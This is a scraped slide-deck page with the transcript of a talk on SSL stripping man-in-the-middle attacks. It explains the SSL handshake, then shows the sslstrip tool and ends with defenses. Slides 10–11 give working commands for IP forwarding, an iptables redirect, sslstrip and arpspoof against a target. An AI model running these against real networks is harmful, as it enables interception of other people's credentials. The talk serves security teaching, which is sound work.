1 / 30

SSL Spoofing

SSL Spoofing. Man-In-The-Middle attack on SSL Duane Peifer. Summary. How SSL works Common SSL misconceptions SSL Spoofing Using sslstrip Preventing SSL Spoofing Examples of stripped sites. How SSL works. Client hello. Client key exchange. Change cipher spec. Client PC. Server hello.

laurie
Download Presentation

SSL Spoofing

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. SSL Spoofing Man-In-The-Middle attack on SSL Duane Peifer

  2. Summary • How SSL works • Common SSL misconceptions • SSL Spoofing • Using sslstrip • Preventing SSL Spoofing • Examples of stripped sites

  3. How SSL works Client hello Client key exchange Change cipher spec Client PC Server hello Certificate Server hello done Change cipher spec Web Server Finished Finished Secure connection

  4. How SSL works HTTP TCP HTTP TCP SSL HTTP HTTPS

  5. Common SSL misconceptions • HTTPS means I am secure right? • What about… • SSL version 2.0 flaws • Weak Ciphers < 128 bit • Certificate keys < 1024 bits • Client vulnerabilities • Server vulnerabilities • Application vulnerabilities • SSL can provide a false sense of security

  6. SSL Spoofing • Moxie Marlinspike created sslstrip and presented at Black Hat DC 2009. http://www.thoughtcrime.org/ • Does not attack SSL itself, but the transition from non-encrypted to encrypted communications.

  7. Common HTTP/HTTPSConnection HTTP Connection on Port 80 Client PC Redirect to HTTPS HTTPS Connection on Port 443 Server Certificate Web Server • Connection Established

  8. Hijacking Communication Client PC HTTP request HTTP request Modified HTTP Response Redirect to HTTPS URL Web Server Non-encrypted communication Encrypted Communication Attacker

  9. Using sslstrip • Get sslstrip • Download and install sslstrip and arpspoof (linux only) • http://www.thoughtcrime.org/software.html • http://sourceforge.net/projects/arpspoof/ • Backtrack 4 (pre-installed) • http://www.backtrack-linux.org/downloads/

  10. Using sslstrip • Configure attack machine for IP forwarding. echo “1” > /proc/sys/net/ipv4/ip_forward • Route all HTTP traffic to sslstrip. iptables –t nat –A PREROUTING –p tcp --destination-port 80 –j REDIRECT --to-port 54321 • Run sslstrip. sslstrip –l 54321

  11. Using sslstrip • Configure ARP spoofing. arpspoof –i eth0 –t <targetIP> <gatewayIP> • Launch a sniffer and collect data.

  12. Expanding the attack • What if a root certificate could be installed on the target? • The attacker could potentially replace the certificate and maintain a secure connection.

  13. Preventing SSL Spoofing • Ensure you are using secure connections. Look for the HTTPS. • Be careful about where you use secure sites. • Secure machines on the network. • Use static ARP tables.* * This is a TON of work. Understand the ramifications of doing this before starting.

  14. Secure

  15. Stripped

  16. Secure

  17. Stripped

  18. Secure

  19. Stripped

  20. Secure

  21. Stripped

  22. Secure

  23. Stripped

  24. Secure

  25. Stripped

  26. Secure

  27. Stripped

  28. Secure

  29. Stripped

  30. Summit FCU <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <script type="text/javascript" src="https://www.summitfcu.org/onlineserv/HB/Signon.cgi?remote=TRUE"></script> <script type="text/javascript">varbPasswordFocus = false;</script>

More Related